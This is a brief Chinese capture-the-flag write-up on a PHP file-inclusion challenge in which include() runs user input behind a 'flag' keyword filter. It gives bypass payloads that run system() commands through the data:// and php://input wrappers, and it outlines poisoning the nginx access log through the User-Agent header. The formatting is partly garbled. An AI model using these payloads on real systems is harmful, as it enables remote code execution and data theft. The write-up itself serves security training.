1. 代码审计
      ```php <?php //flag in flag.php error_reporting(0); if(isset($_GET[‘c’])){ $c = $_GET[‘c’]; if(!preg_match(“/flag/i”, $c)) //正则过滤flag {

      1. include($c);

      //文件包含

      echo $flag;
      

      }

    }else{ highlightfile(_FILE); }

    
    2.  这里可以利用文件包含的伪协议  
    ```shell
    ?c=data://text/plain,<?php system('tac fl*.php');?>
    
    ?c=php://input
    #POST传递
    <?php system('tac flag.php');?>
    
    1. 还可以利用日志文件进行文件包含,让恶意代码执行
      #日志文件路径/var/log/nginx/access.log
      #修改User-agent头部
      利用burp进行重发包,让构造的恶意代码执行
      
      image-20210701131646235.png